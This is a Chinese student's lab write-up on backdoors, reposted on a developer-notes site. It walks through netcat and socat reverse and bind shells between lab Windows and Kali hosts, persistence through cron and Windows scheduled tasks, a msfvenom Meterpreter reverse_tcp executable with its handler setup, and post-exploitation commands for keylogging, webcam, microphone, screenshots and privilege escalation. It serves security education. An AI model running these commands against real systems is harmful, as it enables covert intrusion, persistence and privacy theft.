热门标签 | HotTags
当前位置:  开发笔记 > 编程语言 > 正文

Exp2.1后门原理与实践_20154305_齐帅

Exp2后门原理与实践20154305_齐帅2.1简单后门一、后门工具介绍1.netcat(nc、ncat)是一个底层工具,进行基本的TCPUDP数据收发。常被与其他

Exp2后门原理与实践

20154305 _ 齐 帅

2.1简单后门

一、后门工具介绍

1.netcat(nc、ncat)

  • 是一个底层工具,进行基本的TCP UDP数据收发。常被与其他工具结合使用,起到后门的作用。

2.socat

  • 类似于Netcat的加强版。

以上两个工具均可以在老师课件主页的附件中下载

3.Meterpreter

  • 利用 Metaspolitmsfvenom 指令生成后门可执行文件,本实验要生成的这个后门程序就是Meterpreter。

二、ncat、socat的基础操作

2.1 Windows与linux间获取Shell

2.1.1 Windows主机获取 Linux Shell

Windows:

  1. win主机查本机IP地址:ipconfig

由上图可见IPv4 地址为:192.168.239.1

2.利用netcat.exe程序监听端口:4305

ps:我将解压好的ncat文件包和socat文件包放在了C:\Users\41491_000\ncat目录下,所以需要先cd到ncat目录下,然后输入ncat.exe -l -p 4305监听端口4305

kali:

3.使用nc 192.168.239.1 4305 -e /bin/sh指令反向连接Windows主机的4305端口:

ps:192.168.239.1为win主机地址,即第一步的操作,端口号为自己学号吧

4.Windows执行linux shell指令

此时可以在win_cmd.exe下运行linux 指令

2.1.2 Linux主机获取 Windows shell

Linux :

  1. 查看kali主机IP地址:ifconfig

上图可见kali主机IP地址为192.168.239.131

2.输入nc -l -p 4305指令监听端口

ps:此处忘记截图了。。。

Windows:

3.在cmd窗口使用 ncat.exe -e cmd.exe 192.168.239.131 4305 命令去连接Linux的4305端口。

ps:IP地址和端口号为linux值,注意需要将cmd目录切换到ncat.exe所在目录下。

4.Linux运行Windows shell

ps:连接成功后便可以在linux主机输入windows指令,正常情况下为乱码,后对编码进行了一下调整。

2.2 ncat进行数据传输

1.Windows输入指令ncat.exe -l 4305 监听

2.Linux输入指令nc 192.168.239.1 4305 连接win主机

3.双向传输字符串

2.3 ncat 定时启动

1.Windows输入指令ncat.exe -l -p 4305 监听

2.Linux输入指令crontab -e ,选择一个文本编辑器打开,在最后一行添加代码:40 * * * * /bin/netcat Win的IP 端口 -e /bin/sh 在每小时的40分运行ncat回连win主机

3.时间到了,可以运行Linux shell指令了

ps:我当时时间设置代码的时间是10:37

2.4 socat 定时启动

1.在Windows桌面按键win+I,依次打开 控制面板->系统和安全->管理工具->任务计划,新建一个任务

设置如上

2.新建一个触发器

设置如上

3.新建一个操作

设置如上,其中参数为tcp-listen:4305 exec:cmd.exe,pty,stderr ,4305为端口号,因为什么我也不清楚额

4.确定,查看程序是否在运行,如未运行点击右侧运行按钮使其运行

5.Linux输入指令 socat - tcp:192.168.239.1:4305, windows主机IP、端口号,此时可以获取win的shell命令

三、体验 MSF Meterpreter 功能

3.1 利用msfvenom指令生成后门程序

1.在Linux主机输入指令msfvenom -p windows/meterpreter/reverse_tcp LHOST=Linux的IP LPORT=端口 -f exe > 20154305_backdoor.exe ,此条指令意为生成一个.exe程序,名称为 20154305_backdoor,将来在windows上运行时会回连到Linux主机相应端口

2.成功之后该文件在当前目录,找到之后拷贝到Windows主机,地址随意


3.2 linux进入控制台进行设置

1.Linux输入指令msfconsole

2.在msf>下输入命令use exploit/multi/handler

3.继续输入set payload windows/meterpreter/reverse_tcp 设置payload

4.输入指令set LHOST Linux IP

5.输入指令 set LPORT 4305

6.输入指令show options

3.3 linux开启监听,windows运行后门

1.Linux输入指令exploit 开始监听

2.windows主机双击后门木马程序执行

ps:也可如上图在win主机cmd中执行

3.4 Linux主机操控Windows主机

3.4.1 输入指令record_mic 录制一段音频

3.4.2 输入指令webcam_snap 拍摄照片

3.4.3 输入指令screenshot 截取屏幕

3.4.4 输入指令keyscan_start记录击键内容,输入指令keyscan_dump 获取击键记录

下图是我在win主机上输入的内容

3.4.5 输入指令getuid 查看当前用户,输入指令getsystem 提权

四、回答问题

1.例举你能想到的一个后门进入到你系统中的可能方式?

  • 从不良网站下载文件时绑定了后门木马

2.例举你知道的后门如何启动起来(win及linux)的方式?

  • win中的木马可能伴随软件一同启动,Linux可通过cron启动

3.Meterpreter有哪些给你映像深刻的功能?

  • 记录键盘记录和截屏功能,可能会泄露密码和隐私信息

  • 还有录音和拍照等功能,都会大量泄露隐私

4.如何发现自己有系统有没有被安装后门?

  • 安装杀毒软件

五、实验感想

  • 这个实验的内容在关闭杀毒软件,并且手动启动后门木马的前提下实现了主机对靶机的控制,能操控的范围还是让我很震撼的,使我发现原来操控一台别人的计算机还是挺简单的事情,不过我在实验中有一个疑问,就是我用两台电脑执行Meterpreter攻击,在监听的时候什么也监听不到,但是两台电脑却可以ping通,希望有机会向老师了解一下,并且还很希望下次的面杀实验。

推荐阅读
  • 面试经验分享:华为面试四轮电话面试、一轮笔试、一轮主管视频面试、一轮hr视频面试
    最近有朋友去华为面试,面试经历包括四轮电话面试、一轮笔试、一轮主管视频面试、一轮hr视频面试。80%的人都在第一轮电话面试中失败,因为缺乏基础知识。面试问题涉及 ... [详细]
  • 本文介绍了Python高级网络编程及TCP/IP协议簇的OSI七层模型。首先简单介绍了七层模型的各层及其封装解封装过程。然后讨论了程序开发中涉及到的网络通信内容,主要包括TCP协议、UDP协议和IPV4协议。最后还介绍了socket编程、聊天socket实现、远程执行命令、上传文件、socketserver及其源码分析等相关内容。 ... [详细]
  • 本文详细介绍了Linux中进程控制块PCBtask_struct结构体的结构和作用,包括进程状态、进程号、待处理信号、进程地址空间、调度标志、锁深度、基本时间片、调度策略以及内存管理信息等方面的内容。阅读本文可以更加深入地了解Linux进程管理的原理和机制。 ... [详细]
  • 如何在服务器主机上实现文件共享的方法和工具
    本文介绍了在服务器主机上实现文件共享的方法和工具,包括Linux主机和Windows主机的文件传输方式,Web运维和FTP/SFTP客户端运维两种方式,以及使用WinSCP工具将文件上传至Linux云服务器的操作方法。此外,还介绍了在迁移过程中需要安装迁移Agent并输入目的端服务器所在华为云的AK/SK,以及主机迁移服务会收集的源端服务器信息。 ... [详细]
  • 解决github访问慢的问题的方法集锦
    本文总结了国内用户在访问github网站时可能遇到的加载慢的问题,并提供了解决方法,其中包括修改hosts文件来加速访问。 ... [详细]
  • 目录浏览漏洞与目录遍历漏洞的危害及修复方法
    本文讨论了目录浏览漏洞与目录遍历漏洞的危害,包括网站结构暴露、隐秘文件访问等。同时介绍了检测方法,如使用漏洞扫描器和搜索关键词。最后提供了针对常见中间件的修复方式,包括关闭目录浏览功能。对于保护网站安全具有一定的参考价值。 ... [详细]
  • zabbix中文乱码的问题
    在使用zabbix时,有时候会出现中文乱码的问题,如下:因为zabbix自身对中文简体的支持不完善,需要我们手动的去上传新的字体进行替换:1、在windows获取字体库文件在Windows上的 ... [详细]
  • Nginx使用AWStats日志分析的步骤及注意事项
    本文介绍了在Centos7操作系统上使用Nginx和AWStats进行日志分析的步骤和注意事项。通过AWStats可以统计网站的访问量、IP地址、操作系统、浏览器等信息,并提供精确到每月、每日、每小时的数据。在部署AWStats之前需要确认服务器上已经安装了Perl环境,并进行DNS解析。 ... [详细]
  • Mac OS 升级到11.2.2 Eclipse打不开了,报错Failed to create the Java Virtual Machine
    本文介绍了在Mac OS升级到11.2.2版本后,使用Eclipse打开时出现报错Failed to create the Java Virtual Machine的问题,并提供了解决方法。 ... [详细]
  • 本文介绍了在Win10上安装WinPythonHadoop的详细步骤,包括安装Python环境、安装JDK8、安装pyspark、安装Hadoop和Spark、设置环境变量、下载winutils.exe等。同时提醒注意Hadoop版本与pyspark版本的一致性,并建议重启电脑以确保安装成功。 ... [详细]
  • 【Windows】实现微信双开或多开的方法及步骤详解
    本文介绍了在Windows系统下实现微信双开或多开的方法,通过安装微信电脑版、复制微信程序启动路径、修改文本文件为bat文件等步骤,实现同时登录两个或多个微信的效果。相比于使用虚拟机的方法,本方法更简单易行,适用于任何电脑,并且不会消耗过多系统资源。详细步骤和原理解释请参考本文内容。 ... [详细]
  • 本文介绍了Windows Vista操作系统中的用户账户保护功能,该功能是为了增强系统的安全性而设计的。通过对Vista测试版的体验,可以看到系统在安全性方面的进步。该功能的引入,为用户的账户安全提供了更好的保障。 ... [详细]
  • 本文介绍了在RHEL 7中的系统日志管理和网络管理。系统日志管理包括rsyslog和systemd-journal两种日志服务,分别介绍了它们的特点、配置文件和日志查询方式。网络管理主要介绍了使用nmcli命令查看和配置网络接口的方法,包括查看网卡信息、添加、修改和删除配置文件等操作。 ... [详细]
  • linux服务器时间同步失败解决方法
    linux服务器时间同步失败解决方法1、为什么会时间不同步:①计算机的时间是根据电脑晶振以固定频率震荡而产生的,由于晶振的不同或者老化,会 ... [详细]
  • tomcat的log文件夹下有以下几种日志:1、catalina.YYYY-MM-DD.logcatalina引擎输出的日志;catalina是tomc ... [详细]
author-avatar
陈杰铭雅意
这个家伙很懒,什么也没留下!
PHP1.CN | 中国最专业的PHP中文社区 | DevBox开发工具箱 | json解析格式化 |PHP资讯 | PHP教程 | 数据库技术 | 服务器技术 | 前端开发技术 | PHP框架 | 开发工具 | 在线工具
Copyright © 1998 - 2020 PHP1.CN. All Rights Reserved | 京公网安备 11010802041100号 | 京ICP备19059560号-4 | PHP1.CN 第一PHP社区 版权所有